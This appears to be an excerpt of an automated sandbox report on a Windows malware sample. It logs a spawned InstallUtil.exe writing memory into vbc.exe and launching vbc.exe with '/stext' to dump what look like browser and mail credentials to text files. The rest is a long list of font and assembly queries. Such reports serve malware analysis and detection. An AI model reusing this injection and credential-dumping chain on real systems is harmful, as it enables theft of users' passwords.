                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                  Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: InstallUtil.exe, 00000010.00000002.488876103.0000000001A20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Users\user\Desktop\FukQGQj7cl.exe VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
